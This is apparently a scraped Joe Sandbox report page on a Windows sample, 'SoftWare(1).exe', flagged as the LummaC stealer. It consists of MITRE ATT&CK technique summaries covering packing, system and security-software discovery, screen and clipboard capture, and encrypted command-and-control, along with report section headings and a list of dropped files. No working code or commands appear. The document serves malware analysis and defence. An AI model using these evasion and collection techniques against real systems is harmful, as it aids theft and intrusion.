Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SoftWare(1).exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_aspnet_regiis.ex_90207b4b93c0fbe6f8caeaf6efed237ac9f15ca0_d8295a56_b82e07be-d2da-420e-ab35-b2749b42adf7\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER860B.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER88EB.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER892A.tmp.xml

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SoftWare(1).exe.log

C:\Users\user\AppData\Roaming\msvcp110.dll

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Windows Analysis Report
SoftWare(1).exe

Function 6CF4BEA0 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 381
COMMON

Function 6CF5EF4E Relevance: 10.6, APIs: 7, Instructions: 136
COMMONLIBRARYCODE

Function 6CF5EFFE Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Function 6CF66764 Relevance: 6.1, APIs: 4, Instructions: 74
COMMON

Function 6CF5EE47 Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Function 6CF66D61 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Function 6CF65062 Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre